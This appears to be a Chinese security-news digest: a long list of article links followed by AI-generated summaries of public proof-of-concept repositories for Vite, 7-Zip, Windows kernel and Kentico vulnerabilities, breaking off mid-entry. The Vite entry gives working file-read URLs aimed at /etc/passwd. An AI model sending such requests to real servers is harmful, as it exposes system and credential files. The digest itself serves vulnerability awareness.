|
|||
|
|
* [Java代码审计高阶班?](https://mp.weixin.qq.com/s?__biz=Mzg3MDU1MjgwNA==&mid=2247487268&idx=1&sn=c7e124d5edda8db3d25012c39bc3fb93)
|
|||
|
|
* [4 月见|慢雾SlowMist 邀您共赴香港 Web3 嘉年华及多场行业盛会](https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&mid=2247501679&idx=1&sn=c4d6c5bceb9b869dcd1cb20d3882bde5)
|
|||
|
|
* [《人工智能示范法3.0》正式发布!](https://mp.weixin.qq.com/s?__biz=MzIxMDIwODM2MA==&mid=2653931903&idx=1&sn=0bda17df3845d352d8acdbf1f5dcd995)
|
|||
|
|
* [今日AI快讯:大湾区企业家联盟在港成立人工智能委员会,复旦大学可信具身智能研究院揭牌](https://mp.weixin.qq.com/s?__biz=MzIxMDIwODM2MA==&mid=2653931903&idx=2&sn=0442297f9f38acdb52f67969f9129180)
|
|||
|
|
* [关于举办第二届“长城杯”铁人三项赛(作品赛)的通知](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664239691&idx=1&sn=508c45e05b69fcd3d70d8780be93abfa)
|
|||
|
|
* [庄荣文:深入学习贯彻习近平文化思想 奋力开创网络内容建设和管理工作新局面](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664239691&idx=2&sn=e5a2c9b7c05ac7f5ed81e2d8f560f969)
|
|||
|
|
* [专家解读 | 刘晓春:人工智能生成合成内容标识的法治化规范路径](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664239691&idx=3&sn=7763b94faeb69aba910783a0d3b573a0)
|
|||
|
|
* [通知 | 网安标委发布2025年度第一批网络安全国家标准需求(附清单)](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664239691&idx=5&sn=656e17096ed8bf21dd01e8518ec1d073)
|
|||
|
|
* [前沿 | 把准人工智能治理发展方向](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664239691&idx=6&sn=54992e5c85a43f2280dfe8024eab5e81)
|
|||
|
|
* [观点 | 用法律规范保护好人脸信息](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664239691&idx=7&sn=f5304e8c4964f959d7ec7fe28b9d1cf5)
|
|||
|
|
* [评论 | 为未成年人“触网”打造全面保护体系](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664239691&idx=8&sn=e7cb0c6a89f36b4e679fb2d5ef9d8ce1)
|
|||
|
|
* [5G核心网×BGP=王炸组合!为什么全球运营商都选择BGP?](https://mp.weixin.qq.com/s?__biz=MzUyNTExOTY1Nw==&mid=2247529164&idx=1&sn=1a19b9c3b5cf9715b55cab438049067c)
|
|||
|
|
* [赛博观点 | 浅析数据基础设施中的技术协同与适用类型](https://mp.weixin.qq.com/s?__biz=MzUzODYyMDIzNw==&mid=2247517893&idx=1&sn=e7bdfb439adf4708aa4ab9b1e8e452b8)
|
|||
|
|
* [关于组织开展上海市电信和互联网行业2024年度优秀首席数据官评选活动的通知](https://mp.weixin.qq.com/s?__biz=MzUzODYyMDIzNw==&mid=2247517893&idx=2&sn=01bf8bf1ddd0852b3044c3175cecc0b6)
|
|||
|
|
* [河南省企业首席数据官认证培训班招生简章](https://mp.weixin.qq.com/s?__biz=MjM5NjA2NzY3NA==&mid=2448686707&idx=1&sn=65d17eef1f7cc6038b8f4428e66c8c93)
|
|||
|
|
* [6G洞见 | 段向阳:6G产业生态最大挑战在于技术确定性与商业不确定性](https://mp.weixin.qq.com/s?__biz=Mzg4MDU0NTQ4Mw==&mid=2247530213&idx=1&sn=18860f73ce91dc719d797e18ac527c2d)
|
|||
|
|
* [盛邦安全 “低空网络安全技术在无人机多场景应用” 成功入选 2025 年度低空经济典型案例,引领行业安全创新发展](https://mp.weixin.qq.com/s?__biz=MzAwNTAxMjUwNw==&mid=2650277984&idx=1&sn=46b8d776669a29a49264c4ba239f354c)
|
|||
|
|
* [socket编程到底是什么?](https://mp.weixin.qq.com/s?__biz=MzIxNTM3NDE2Nw==&mid=2247490384&idx=1&sn=7a84ffb8cc6ad9334514422dcc9dd3d6)
|
|||
|
|
* [中关村U30 2024年度优胜者榜单公布,云起无垠沈凯文博士入选](https://mp.weixin.qq.com/s?__biz=Mzg3Mjg4NTcyNg==&mid=2247490277&idx=1&sn=5cf1336bfe6bb500619afbd37e7d515b)
|
|||
|
|
* [《中华人民共和国网络安全法》征求意见](https://mp.weixin.qq.com/s?__biz=Mzg3NzUyMTM0NA==&mid=2247487936&idx=1&sn=572306441a2894013f5ac35740d7627f)
|
|||
|
|
* [关于公开征求《中华人民共和国网络安全法(修正草案再次征求意见稿)》意见的通知](https://mp.weixin.qq.com/s?__biz=MzI2MzU0NTk3OA==&mid=2247506162&idx=1&sn=7465c937d5c3a5c61a58a31ce713f207)
|
|||
|
|
* [深度测评 | 聚铭下一代智慧安全运营中心如何破解电力行业安全运维难题?](https://mp.weixin.qq.com/s?__biz=MzIzMDQwMjg5NA==&mid=2247506899&idx=1&sn=76e910772b3bf25d3f4406d0fff0ad55)
|
|||
|
|
* [安全聘 | 滴滴安全岗招人啦](https://mp.weixin.qq.com/s?__biz=MzU2MTQwMzMxNA==&mid=2247541800&idx=1&sn=f252e2d4d57d48e4cff6b38a507fca7e)
|
|||
|
|
* [24小时Boss战:微服务/AI/Rust三大终极关卡,你敢开团吗?](https://mp.weixin.qq.com/s?__biz=MzI1MzYzMjE0MQ==&mid=2247514033&idx=1&sn=75cc1ae2a1ea1d39463eca7beeee1669)
|
|||
|
|
* [密码筑基,智护山河——某省水利厅携手信安世纪 以密码技术托举山洪灾害防御生命线](https://mp.weixin.qq.com/s?__biz=MjM5NzgzMjMwNw==&mid=2650664255&idx=1&sn=2316db7ee301e3cc1f49201fba48c865)
|
|||
|
|
* [会议活动邀请函 | 智能网联汽车车辆运行安全监测平台(VSOC)遴选活动](https://mp.weixin.qq.com/s?__biz=MjM5NzYwNDU0Mg==&mid=2649251475&idx=1&sn=a37b52a1c27620c16407b42ae7f73b3c)
|
|||
|
|
* [赛迪热点赛迪论坛2025丨8项新型工业化重点理论研究成果发布](https://mp.weixin.qq.com/s?__biz=MjM5NzYwNDU0Mg==&mid=2649251475&idx=2&sn=0cb4e1cadaa0990a2035e63b17fbe469)
|
|||
|
|
* [创信关注丨数据领域常用名词解释(第二批)](https://mp.weixin.qq.com/s?__biz=MzUxNTQxMzUxMw==&mid=2247525397&idx=1&sn=60c9659bf7d73e6d810c467265e391a5)
|
|||
|
|
* [培训资讯丨从数据泄露到勒索病毒:信息安全应急响应全过程揭秘](https://mp.weixin.qq.com/s?__biz=MzUxNTQxMzUxMw==&mid=2247525397&idx=2&sn=95bd6b556dd544fbcdae62ce4d93716e)
|
|||
|
|
* [想要获得高薪吗?11个热门IT安全证书或许可以帮到你](https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247638373&idx=1&sn=6e4c54daf7a962e9b02f3868b61cca4c)
|
|||
|
|
* [欧盟将投资13亿欧元加强网络安全和AI](https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247638373&idx=3&sn=94858f688b24e2d0ff06696eeda4ebd6)
|
|||
|
|
* [LLM+MCP=RCE?](https://mp.weixin.qq.com/s?__biz=MzIwODc2NjgxNA==&mid=2247485025&idx=1&sn=1299230c1473f418b488bad301d34711)
|
|||
|
|
* [新规下的安防密钥:网御星云助力构建公共安全视频监控合规生态](https://mp.weixin.qq.com/s?__biz=MzA3NDUzMjc5Ng==&mid=2650203255&idx=1&sn=635b58cf09448f1efd17bea0907fa8ff)
|
|||
|
|
* [拥有600+门店的宠物连锁医院,以托管云实现核心业务系统上云](https://mp.weixin.qq.com/s?__biz=MjM5MTAzNjYyMA==&mid=2650597861&idx=1&sn=c66ff6eaea86621b21203e816b7dfeed)
|
|||
|
|
* [MCP开发实战-如何使用MCP真正加速UE项目开发](https://mp.weixin.qq.com/s?__biz=MjM5ODYwMjI2MA==&mid=2649792547&idx=1&sn=39a5bf9d79bfc92a937847243568f614)
|
|||
|
|
* [CISSP安心保障:4月11日前购买,解锁两次考试机会](https://mp.weixin.qq.com/s?__biz=MzUzNTg4NDAyMg==&mid=2247492558&idx=1&sn=10f3870c693abc1602a05bd6bdd2561b)
|
|||
|
|
* [家门口能装摄像头吗?哪些区域严禁安装?一文了解](https://mp.weixin.qq.com/s?__biz=MjM5MzMwMDU5NQ==&mid=2649171966&idx=1&sn=49eda5f752392e0cb8c881aa0ae3a554)
|
|||
|
|
* [火热招生中!CISAW个人信息安全认证课程](https://mp.weixin.qq.com/s?__biz=MzU0Mzk0NDQyOA==&mid=2247521710&idx=1&sn=8121aceaa551c42668e09604446b3a34)
|
|||
|
|
* [后疫情时代全球生物安全新动向](https://mp.weixin.qq.com/s?__biz=MzI1OTExNDY1NQ==&mid=2651620226&idx=1&sn=09d643658b03e579f28ffbe67cc1f7b7)
|
|||
|
|
* [2025腾讯游戏安全技术竞赛初赛-题解有源码](https://mp.weixin.qq.com/s?__biz=MjM5Mjc3MDM2Mw==&mid=2651142125&idx=1&sn=0c893d6be87fe710f3000c82e9590822)
|
|||
|
|
* [ChatGPT、DeepSeek 从下载到精通,附30GB AI资料下载链接](https://mp.weixin.qq.com/s?__biz=MzU1ODgwNDYwNg==&mid=2247484612&idx=1&sn=facef75c9d4a8db3540648273f059b29)
|
|||
|
|
* [AI打假新突破!GetReal的“AI变脸防伪术”获1800万美元投资](https://mp.weixin.qq.com/s?__biz=MzI1MDU5NjYwNg==&mid=2247496771&idx=1&sn=51b7e8b4fc042a129fe04c5aa509b4ce)
|
|||
|
|
* [404星链计划 | 收录优质开源安全项目+4](https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650990848&idx=1&sn=7bfcb4adba2863bfa4d8ef6a1480819a)
|
|||
|
|
* [300万安全人才缺口下,应届生为何“毕业即失业”?](https://mp.weixin.qq.com/s?__biz=MzUzNjkxODE5MA==&mid=2247489404&idx=1&sn=1bf175cc41d7bf0f196854c7bcc4b750)
|
|||
|
|
* [为什么总有人劝你别考cisp?因为他们都偷偷考完了!](https://mp.weixin.qq.com/s?__biz=MzU2NzMwNTgxNQ==&mid=2247491752&idx=1&sn=25b36f554637f875348aa137c4e05903)
|
|||
|
|
* [“AI”在西安,补天白帽黑客城市沙龙首站成功举办!](https://mp.weixin.qq.com/s?__biz=MzU4MzgwODc3Ng==&mid=2247498387&idx=1&sn=36b90f8386902307f1c51efb737ca3c1)
|
|||
|
|
* [先知社区焕新升级!稿费再创新高,功能全面升级](https://mp.weixin.qq.com/s?__biz=MzIxMjEwNTc4NA==&mid=2652997693&idx=1&sn=056f36123e2e252f6c7dbcd332f856a7)
|
|||
|
|
* [专家解读|强化法治保障 维护网络安全](https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649401610&idx=2&sn=e586ce5ea14e0c8ee9e805c2fde5eb68)
|
|||
|
|
* [专家解读|夯实网络安全制度基石 完善网络法律制度体系](https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649401610&idx=3&sn=0ff8f242a52dbe3143c2bded554f5d51)
|
|||
|
|
* [专家解读|促进法律制度衔接 增强网络立法协同](https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649401610&idx=4&sn=80d35086b39d529061e6b84c903717f0)
|
|||
|
|
* [专家解读|完善法律责任制度 筑牢网络安全屏障](https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649401610&idx=5&sn=8b8ec227d63e3f57bf38c8185f1fb1a5)
|
|||
|
|
* [专家解读|贯彻总体国家安全观 护航网络强国建设](https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649401610&idx=6&sn=4728e478ac17b9687902ba15cb9f239a)
|
|||
|
|
* [贯彻八项规定改进工作作风,总书记引用的这些古语耐人寻味](https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649401609&idx=1&sn=b8dae1195fad8407cb7ab4cc0b6496bf)
|
|||
|
|
* [金句|贯彻落实中央八项规定精神,总书记阐明要旨](https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649401609&idx=2&sn=9326b5e7d38e99d6860bcaa0479e7cfe)
|
|||
|
|
* [习言道|八项规定出台时,习近平强调不加这俩字](https://mp.weixin.qq.com/s?__biz=MzA3ODE0NDA4MA==&mid=2649401609&idx=3&sn=cadcee3dd6284866e1969e4a431ef599)
|
|||
|
|
* [《网络安全法》迎最新修订,五大方面变化全解析!](https://mp.weixin.qq.com/s?__biz=MzA3NDIwNTY5Mw==&mid=2247507789&idx=1&sn=fe871c39c2d60f29fb4d98ed3e7d76a3)
|
|||
|
|
* [普老板的“铜墙铁壁”:透视俄罗斯总统的安保体系](https://mp.weixin.qq.com/s?__biz=MzA3Mjc1MTkwOA==&mid=2650560460&idx=1&sn=dfbbf4fdb343e399c07e00e06d33ac74)
|
|||
|
|
* [微信今日发布桌面端 4.0 版本且正式上线产品官网,实现多桌面端统一](https://mp.weixin.qq.com/s?__biz=MzU5MjgwMDg1Mg==&mid=2247485047&idx=1&sn=6ccb803ab3d4c06a53cd48473ef17afa)
|
|||
|
|
* [AI应用来临必将改变事件,普通人该如何应对?](https://mp.weixin.qq.com/s?__biz=MzUzNjkxODE5MA==&mid=2247489399&idx=1&sn=fa1755ead89a2912f006b5fdafb2f9d7)
|
|||
|
|
* [合作单位动态融信天下合作伙伴大会2025在京召开](https://mp.weixin.qq.com/s?__biz=MzA3NzgzNDM0OQ==&mid=2664994401&idx=2&sn=e19fb402b85626603cdd717cd64f3601)
|
|||
|
|
* [业界动态数据领域常用名词解释(第二批)](https://mp.weixin.qq.com/s?__biz=MzA3NzgzNDM0OQ==&mid=2664994401&idx=3&sn=60c73859878bfe3301db53baa8341548)
|
|||
|
|
* [开源社区快被⼤模型抓崩溃了;|快递员因同一人连收100个包裹报警了](https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650609973&idx=1&sn=e489cc4e678f0ff82965ca5e574d8fcc)
|
|||
|
|
* [关于清明节假期值班期间双倍财政补助的通知](https://mp.weixin.qq.com/s?__biz=MzIxOTk0ODY0NQ==&mid=2247485454&idx=1&sn=516fd32d58ac77b7801f0e014ad9f4ec)
|
|||
|
|
* [美军网络运维机构和防御性网络作战机构四项首要任务](https://mp.weixin.qq.com/s?__biz=MzI4ODQzMzk3MA==&mid=2247489835&idx=1&sn=0783cf31aad5d249a9b5194f2e8970ec)
|
|||
|
|
* [网络工程师工作中遇到能力差的领导,应该如何相处?](https://mp.weixin.qq.com/s?__biz=MzUyNTExOTY1Nw==&mid=2247529163&idx=1&sn=d42f9f9e0f69f64d9a4b93fac1bdea0a)
|
|||
|
|
* [重要通知!清明节放假七天!!!](https://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247501077&idx=1&sn=b10a7209bb0718853b36dbd53ef62d7c)
|
|||
|
|
* [以创新赋能通信安全,江南信安首次亮相国际星闪联盟产业峰会](https://mp.weixin.qq.com/s?__biz=MzA4MTE0MTEwNQ==&mid=2668670187&idx=1&sn=ef80acd4fb0afd460dccd674b5ec7634)
|
|||
|
|
* [工信部等三部门联合印发《轻工业数字化转型实施方案》](https://mp.weixin.qq.com/s?__biz=MzIxNjI2NjUzNw==&mid=2247493095&idx=1&sn=c6caf9587619dfc181968394dce47abb)
|
|||
|
|
* [2025HVV蓝队中高级精英第七批招聘](https://mp.weixin.qq.com/s?__biz=Mzg3MDY2NDE0MQ==&mid=2247491626&idx=1&sn=ba8c669f97e95ea5895b021c8256a69f)
|
|||
|
|
* [迪普科技×DeepSeek l AI赋能安全运营,智能运营再升级](https://mp.weixin.qq.com/s?__biz=MzA4NzE5MzkzNA==&mid=2650373363&idx=1&sn=cb881f6a1e9c3c567cdbed30bb23c4a0)
|
|||
|
|
* [政策解读丨《公共安全视频图像信息系统管理条例》4月1日起施行](https://mp.weixin.qq.com/s?__biz=MzA4NzE5MzkzNA==&mid=2650373363&idx=2&sn=bdfd311d90bac7a6642f3c9e19e2690d)
|
|||
|
|
* [本周福利这份审计必备资料包和CISA练习题送给你](https://mp.weixin.qq.com/s?__biz=MzU4MjUxNjQ1Ng==&mid=2247522764&idx=1&sn=ba9bbb31b1838111def3c818b91785f4)
|
|||
|
|
* [PMP各地出台政策速览!说真的,你需要考一个PMP证书了](https://mp.weixin.qq.com/s?__biz=MzU4MjUxNjQ1Ng==&mid=2247522764&idx=2&sn=33f6021f4d430f58af6658c477c228ce)
|
|||
|
|
* [升级预告!安全牛平台3.0震撼来临!赋能网络安全行业!](https://mp.weixin.qq.com/s?__biz=MzU4MjUxNjQ1Ng==&mid=2247522764&idx=3&sn=46d20495af0b286eccb8515595db4408)
|
|||
|
|
* [关于清明节假期延长至七天的通知!](https://mp.weixin.qq.com/s?__biz=MzI0NjE1NDYyOA==&mid=2247485310&idx=1&sn=462da9ef8480bc808664b5a8ebd443bf)
|
|||
|
|
* [hackmyvm-twisted](https://mp.weixin.qq.com/s?__biz=Mzg3NTg4NTkyMQ==&mid=2247485744&idx=1&sn=a06f5b48864c1d61a5a1946f229f84b5)
|
|||
|
|
* [绕过Cloudflare寻找真实IP](https://mp.weixin.qq.com/s?__biz=Mzg2NTk4MTE1MQ==&mid=2247487029&idx=1&sn=a94b0e1df046fbda2b55f1b5aab6b934)
|
|||
|
|
* [思维世纪清明节放假通知](https://mp.weixin.qq.com/s?__biz=MjM5ODE4OTYzNw==&mid=2649564205&idx=1&sn=44723311e3d29ae258707dd1c7d5a120)
|
|||
|
|
* [面试经验分享 | 成都渗透测试工程师二面面经分享](https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247548921&idx=1&sn=08a17761267da5a21b2d298000fa45b4)
|
|||
|
|
* [面试经验分享 | 成都某安全厂商渗透测试工程师](https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247548921&idx=2&sn=bb83467dbd979e75fd3cc196061e7465)
|
|||
|
|
* [vulnstack红日靶场1,以cs为主进行的域渗透](https://mp.weixin.qq.com/s?__biz=MzAxNTg1MDYxNA==&mid=2247491329&idx=1&sn=324403c63d0a67dfdd3f9b995482b83a)
|
|||
|
|
* [MCP规划出行计划,感觉很美好的样子](https://mp.weixin.qq.com/s?__biz=MzI5MjM2NTc0MQ==&mid=2247484367&idx=1&sn=2d8095bb495deadf0425676e8c9b30c0)
|
|||
|
|
* [关于2025年清明节假期延长至七天的通知](https://mp.weixin.qq.com/s?__biz=MzkyOTQ4NTc3Nw==&mid=2247485608&idx=1&sn=9434ba726b2e11856a587fdf0f468fd2)
|
|||
|
|
* [2025中关村论坛年会 | 天融信建言京津冀协同发展,解码雄安未来之城安全内核](https://mp.weixin.qq.com/s?__biz=MzA3OTMxNTcxNA==&mid=2650967746&idx=1&sn=8a7afdeddb11c57d98e07e20195fc168)
|
|||
|
|
* [修改ELF的p_flags](https://mp.weixin.qq.com/s?__biz=MzUzMjQyMDE3Ng==&mid=2247488201&idx=1&sn=16a72247d987749305411810a9707bdc)
|
|||
|
|
* [安博通钟竹:成为AI时代安全算力生态的构建者](https://mp.weixin.qq.com/s?__biz=MzIyNTA5Mzc2OA==&mid=2651137668&idx=1&sn=2337f733c08e23fe01d07d2627dd77d8)
|
|||
|
|
|
|||
|
|
## 安全分析
|
|||
|
|
(2025-04-01)
|
|||
|
|
|
|||
|
|
本文档包含 AI 对安全相关内容的自动化分析结果。[概览](https://blog.897010.xyz/c/today)
|
|||
|
|
|
|||
|
|
|
|||
|
|
### CVE-2025-30208 - Vite开发服务器任意文件读取漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-30208 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-31 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-31 17:34:48 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-30208-EXP](https://github.com/Ahmed-mostafa03/CVE-2025-30208-EXP)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了针对CVE-2025-30208漏洞的利用程序。该漏洞是Vite开发服务器中的一个任意文件读取漏洞。 仓库包含Python脚本,用于检测和利用该漏洞,通过构造特定的URL请求,读取目标服务器上的任意文件,例如 /etc/passwd。 初始版本为基础的漏洞检测工具,后续更新增加了代理支持、字典fuzz功能。 最新提交主要更新了README.md文件,增加了关于漏洞的描述、利用方法、以及免责声明等信息。 增加了下载和运行的链接,并提供了漏洞描述。 漏洞的利用方法是通过构造特定的URL来读取任意文件。 该漏洞允许攻击者读取服务器上的敏感文件,可能导致信息泄露,进而被用于进一步的攻击。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Vite开发服务器任意文件读取 |
|
|||
|
|
| 2 | 通过构造URL读取任意文件 |
|
|||
|
|
| 3 | 影响范围广,利用简单 |
|
|||
|
|
| 4 | 可读取/etc/passwd等敏感文件 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:Vite开发服务器存在设计缺陷,导致对某些特定构造的URL请求,未进行充分的权限校验,从而可以读取服务器上的任意文件。
|
|||
|
|
|
|||
|
|
> 利用方法:构造如 /@fs/etc/passwd?raw 或 /@fs/etc/passwd?import&raw?? 等URL进行文件读取。
|
|||
|
|
|
|||
|
|
> 修复方案:升级Vite版本,对请求进行严格的过滤和校验,限制可访问的文件路径。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Vite开发服务器
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的Vite开发服务器,存在明确的利用方法,可以读取服务器上的任意文件,导致敏感信息泄露,对信息安全构成威胁。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-0411 - 7-Zip MotW Bypass漏洞POC
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-0411 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-31 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-31 17:25:51 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [7-Zip-CVE-2025-0411-POC](https://github.com/dpextreme/7-Zip-CVE-2025-0411-POC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了CVE-2025-0411漏洞的POC,该漏洞是7-Zip软件的Mark-of-the-Web (MotW) 绕过漏洞。该漏洞允许攻击者绕过MotW保护机制,从而可能导致恶意代码执行。仓库中包含POC场景,演示了如何通过构造恶意压缩文件来绕过安全防护。最新的更新主要修改了README.md文件,更新了仓库的描述,增加了下载链接和对POC场景的介绍,以及修复了CVE链接。漏洞的利用方式是构造特殊的7z压缩文件,当用户解压该文件时,由于7-Zip未正确处理MotW信息,导致恶意文件得以执行。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 7-Zip Mark-of-the-Web (MotW) 绕过漏洞 |
|
|||
|
|
| 2 | 用户需交互,需诱使用户打开恶意压缩文件 |
|
|||
|
|
| 3 | 可能导致任意代码执行 |
|
|||
|
|
| 4 | POC代码已在仓库中提供 |
|
|||
|
|
| 5 | 影响7-Zip特定版本 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:7-Zip在处理压缩文件时,没有正确地传递MotW信息给解压后的文件,从而绕过了Windows系统的安全保护机制
|
|||
|
|
|
|||
|
|
> 利用方法:构造恶意的7z压缩文件,其中包含恶意可执行文件。用户解压该文件后,恶意文件将绕过MotW保护直接执行。
|
|||
|
|
|
|||
|
|
> 修复方案:升级到7-Zip的修复版本(版本24.09或更高),或谨慎对待来自未知来源的压缩文件。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 7-Zip (版本低于 24.09)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的7-Zip软件,且提供了明确的POC,可以用于验证漏洞。漏洞危害较高,可导致任意代码执行。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-21333 - CVE-2025-21333 堆溢出漏洞 POC
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-21333 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-31 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-31 17:24:00 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-21333-POC](https://github.com/Mukesh-blend/CVE-2025-21333-POC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了针对 CVE-2025-21333 漏洞的 Proof of Concept (POC) 攻击代码。该漏洞是一个基于堆的缓冲区溢出漏洞,攻击者可以利用 WNF 状态数据和 I/O ring IOP_MC_BUFFER_ENTRY 来触发。仓库包含 POC 源码、漏洞利用方法说明以及利用过程中的截图。最近的更新主要集中在 README.md 文件的修改,包括对漏洞描述、利用方法和下载链接的更新,特别是增加了对 POC 代码的下载链接和使用说明,这表明漏洞利用代码已趋于完善。根据提供的README,该漏洞利用了I/O环缓冲区溢出技术。攻击者通过控制IOP_MC_BUFFER_ENTRY数组中的一个条目,实现内核任意地址的读写。该技术利用堆溢出和UAF漏洞,可能导致Ring0级别的权限提升。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于堆的缓冲区溢出漏洞 |
|
|||
|
|
| 2 | 利用 WNF 和 I/O Ring 进行攻击 |
|
|||
|
|
| 3 | POC 代码已发布 |
|
|||
|
|
| 4 | 可实现内核任意地址读写 |
|
|||
|
|
| 5 | Windows Sandbox 环境下测试 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:堆溢出漏洞,通过控制 I/O Ring 中的指针,实现对内核内存的读写。
|
|||
|
|
|
|||
|
|
> 利用方法:利用 WNF 状态数据和 I/O Ring IOP_MC_BUFFER_ENTRY,通过构造恶意的 IOP_MC_BUFFER_ENTRY,实现内核内存的读写。
|
|||
|
|
|
|||
|
|
> 修复方案:微软官方补丁,修补vkrnlintvsp.sys驱动程序中的漏洞。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• vkrnlintvsp.sys
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
POC 代码已发布,具有实际的漏洞利用价值,可实现内核任意地址读写,影响较高。考虑到其针对内核的攻击,一旦成功,可能导致系统权限被完全控制。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-0011 - Kentico Xperience 13 认证绕过
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-0011 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-03-31 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-03-31 17:12:25 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [kentico-xperience13-AuthBypass-CVE-2025-0011](https://github.com/binarywarm/kentico-xperience13-AuthBypass-CVE-2025-0011)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
